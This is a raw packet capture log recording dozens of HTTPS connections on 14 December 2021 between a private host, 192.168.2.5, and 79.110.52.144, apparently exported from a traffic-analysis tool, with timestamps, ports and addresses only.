                          Dec 14, 2021 10:34:07.441411018 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.441432953 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.441448927 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.441488028 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.441803932 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.441840887 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.441900015 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.441914082 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.441931009 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.442204952 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.442414045 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.442444086 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.442523003 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.442536116 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.442553043 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.442605972 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.443058014 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.443088055 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.443140030 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.443152905 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.443196058 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.443216085 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.443734884 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.443768024 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.443936110 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.443954945 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.444250107 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.444317102 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.444344997 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.444405079 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.444417000 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.444437981 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.444478035 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.450846910 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.450906992 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.451057911 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.451829910 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.451868057 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.461358070 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.461386919 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.461477041 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.461507082 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.461520910 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.461690903 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.462296009 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.462321043 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.462404013 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.462429047 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.462440968 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.462546110 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.463115931 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.463140965 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.463217020 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.463238001 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.463260889 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.463306904 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.463884115 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.463927031 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.463979959 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.464006901 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.464023113 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.464099884 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.464113951 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.464133024 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.464199066 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.464538097 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.464559078 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.486041069 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.486095905 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.486154079 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.486177921 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.486201048 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.486213923 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.486597061 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.486641884 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.486690044 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.486700058 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.486723900 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.486757040 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.487169981 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.487221956 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.487251043 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.487262011 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.487344027 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.487348080 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.487658978 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.487698078 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.487725019 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.487735987 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.487771034 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.488480091 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.488518953 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.488576889 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.488590002 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.488604069 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.488621950 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.489738941 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.489779949 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.489808083 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.489826918 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.489835024 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.489842892 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.489866972 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.490637064 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.490675926 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.490725040 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.490736008 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.490780115 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.510221958 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.510274887 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.510365963 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.510402918 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.510418892 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.510483027 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.510499001 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.510674953 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.511590004 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.511609077 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.511677027 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.511730909 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.528919935 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.529000998 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.532192945 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.532210112 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.532432079 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.535053968 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.576864958 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.600094080 CET49799443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.600136042 CET4434979979.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.600229025 CET49799443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.601459026 CET49799443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.601486921 CET4434979979.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.612072945 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.612121105 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.612157106 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.612253904 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.612277031 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.612350941 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.613373041 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.613420963 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.613502979 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.613521099 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.613532066 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.613596916 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.636260986 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.636311054 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.636368990 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.636385918 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.636409044 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.637020111 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.637062073 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.637069941 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.637082100 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.637104034 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.637154102 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.637588024 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.637629986 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.637653112 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.637671947 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.637695074 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.088396072 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.088449955 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.088511944 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.088538885 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.088552952 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.088603973 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.088632107 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.088650942 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.088679075 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.088692904 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.088707924 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.088716984 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.088762999 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.088774920 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089140892 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089194059 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089237928 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089256048 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089270115 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089329958 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089469910 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089490891 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089556932 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089576006 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089591980 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089685917 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089728117 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089756012 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089812994 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089827061 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.089840889 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.089891911 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.090239048 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.090293884 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.090362072 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.090380907 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.090394020 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.090409040 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.090488911 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.090502977 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.090588093 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.090656042 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.090878010 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.090902090 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.090976000 CET49802443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.090989113 CET4434980279.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.091483116 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.091507912 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.091672897 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.091692924 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.091761112 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.092473030 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.092497110 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.092566967 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.092577934 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.092603922 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.092619896 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.093379974 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.093410015 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.093480110 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.093498945 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.093542099 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.093561888 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.097887993 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.097910881 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.097990036 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098021030 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.098043919 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098134995 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098455906 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.098498106 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.098551035 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098575115 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.098604918 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098645926 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098742008 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.098790884 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.098818064 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098839045 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.098861933 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.098896980 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.099303007 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.099358082 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.099404097 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.099430084 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.099447966 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.099461079 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.099523067 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.099544048 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.099610090 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.099718094 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.100064993 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.100090981 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.100138903 CET49801443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.100161076 CET4434980179.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.111049891 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.111083984 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.111216068 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.111303091 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.111320019 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.111387968 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.111412048 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.111433983 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.111464024 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.111473083 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.111520052 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.111547947 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.112185955 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.112261057 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.112278938 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.112289906 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.112380028 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.112385988 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.112699032 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.112730026 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.112822056 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.112838984 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.112946987 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.120249033 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.120315075 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.120328903 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.120471954 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.120501995 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.120539904 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.120558977 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.120569944 CET49803443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.120579004 CET4434980379.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.307866096 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.307905912 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.307981014 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.308825970 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.308842897 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.343209982 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.343264103 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.343410015 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.344280005 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.344306946 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.388299942 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.388484001 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.390249968 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.390259027 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.390649080 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.393121004 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.429994106 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.430315971 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.432585955 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.432605982 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.432913065 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.435363054 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.436866999 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.447069883 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.447124958 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.447462082 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.447889090 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.447913885 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.455698013 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.455722094 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.455929041 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.455975056 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.456003904 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.456521034 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.456546068 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.456556082 CET49805443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.456564903 CET4434980579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.476892948 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.486798048 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.486826897 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.486898899 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.486958981 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.487390995 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.487412930 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.487441063 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.487755060 CET49806443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.487773895 CET4434980679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.526319981 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.526705980 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.528278112 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.528295040 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.528758049 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.530826092 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.572969913 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.579396963 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.579433918 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.579529047 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.579592943 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.579616070 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.579988956 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.580018044 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.580032110 CET49807443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.580044031 CET4434980779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.814553976 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.814584017 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.815311909 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.815332890 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.815337896 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.892996073 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.893079996 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.896908045 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.896917105 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.897583008 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.900059938 CET49808443192.168.2.579.110.52.144
